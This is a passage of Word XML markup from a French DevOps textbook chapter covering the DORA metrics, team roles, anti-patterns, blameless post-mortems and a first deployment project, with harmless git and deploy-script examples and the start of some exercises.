          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plusieurs par jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Délai de livraison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Du commit à la production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Moins d'une heure</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Taux d'échec des changements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Part des déploiements causant un incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moins de 15 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Temps de rétablissement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Durée de restauration après incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Moins d'une heure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CES MÉTRIQUES NE MESURENT PAS DES PERSONNES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Utilisées pour évaluer une équipe ou un individu, elles sont détournées : on cesse de livrer pour améliorer le taux d'échec, ou l'on découpe les changements pour améliorer la fréquence. Elles décrivent un système.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="57" name="Picture 57"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f55.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.55 — Le trajet mesuré par DORA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un premier indicateur, sans outil dédié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Mesurer le délai de livraison depuis l'historique Git</w:t>
        <w:br/>
        <w:t>git log --merges --first-parent main \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --format="%h %ad %s" --date=iso | head -20</w:t>
        <w:br/>
        <w:br/>
        <w:t># Comparer deux périodes</w:t>
        <w:br/>
        <w:t>git log --since="2026-01-01" --until="2026-04-01" --oneline | wc -l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>46.4 Les rôles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le DevOps n'efface pas les spécialités : il change leur point de contact. Trois familles de responsabilités coexistent dans une équipe mature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.161 — Cinq rôles et leurs pièges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25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380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Responsabilité principale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Développement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fonctionnalité et qualité du code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2958"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ignorer la production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Disponibilité et capacité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Devenir un guichet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fiabilité mesurée par des objectifs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2958"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Confondre avec support</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Plateforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Outils et parcours self-service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Construire trop tôt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Menaces et conformité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2958"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Arriver en fin de chaîne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SRE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Site Reliability Engineering : application des pratiques d'ingénierie logicielle à l'exploitation, avec des objectifs de niveau de service explicites et un budget d'erreur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'équipe de plateforme mérite une mention particulière : elle ne livre pas les applications, elle rend les autres équipes autonomes. Une plateforme construite avant d'avoir des utilisateurs est une dette, pas un actif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>46.5 Les anti-patrons</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Beaucoup d'initiatives DevOps échouent pour des raisons identifiables. Les reconnaître tôt évite plusieurs mois d'efforts inutiles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.162 — Cinq anti-patrons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86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Anti-patron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Manifestation</w:t>
            </w:r>
          </w:p>
        </w:tc>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Alternative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Équipe « DevOps » isolée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Elle déploie pour les autres</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Autonomiser les équipes produit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Automatisation du chaos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Scripts non versionnés</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Tout dans le dépôt, revu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pipeline théâtral</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vert sans test réel</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Tests qui peuvent échouer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Culte de l'outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Kubernetes pour un site vitrine</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Commencer par le problème</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Post-mortem accusatoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>« Qui a cassé ? »</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 Quel garde-fou manquait ? »</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POST-MORTEM SANS BLÂME</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un compte rendu d'incident décrit les faits, la chronologie, les hypothèses et les actions correctives. Il ne nomme pas de coupable : la personne qui a déclenché l'incident est celle qui avait le droit d'agir, et le système lui a permis de se tromper.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>46.6 Par où commencer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une transformation commence par un chantier mesurable, choisi pour son rapport entre effort et douleur évitée. Trois candidats reviennent presque toujours.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Réduire le délai de déploiement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : supprimer les étapes manuelles.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Augmenter la fréquence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : livrer par petits lots plus souvent.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Réduire le temps de rétablissement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : préparer le retour arrière.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une cible simple et vérifiable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Premier chantier : un déploiement en une commande</w:t>
        <w:br/>
        <w:t>./scripts/deploy.sh production</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ce qu'il doit faire, dans l'ordre</w:t>
        <w:br/>
        <w:t># 1. Construire un artefact reproductible</w:t>
        <w:br/>
        <w:t># 2. Exécuter les tests</w:t>
        <w:br/>
        <w:t># 3. Publier avec une version identifiable</w:t>
        <w:br/>
        <w:t># 4. Basculer le trafic</w:t>
        <w:br/>
        <w:t># 5. Vérifier la santé</w:t>
        <w:br/>
        <w:t># 6. Savoir revenir à la version précédente</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LES TROIS QUESTIONS D'UN PREMIER DIAGNOSTIC</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Combien de temps s'écoule entre un commit et la production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Quelles étapes de ce trajet sont manuelles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Combien de temps faut-il pour revenir en arrière ?</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DevOps réunit développement et exploitation autour d'un objectif commun.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Trois voies : flux, rétroaction, apprentissage.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DORA mesure la fréquence, le délai, le taux d'échec et le rétablissement.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Ces métriques décrivent un système, jamais des individus.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SRE fixe des objectifs de fiabilité explicites.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équipe plateforme sert les autres équipes.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post-mortem sans blâme améliore le système, pas la réputation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La culture est posée ; reste le terrain. Le chapitre suivant entre dans le système d'exploitation qui héberge tout le reste : Linux.</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46.1 — Mesurer son propre délai de livraison</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Choisissez trois déploiements récents et calculez le délai.</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Relevez l'heure du dernier commit.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Relevez l'heure de mise en production.</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Identifiez l'étape la plus longue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 46.2 — Écrire un post-mortem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
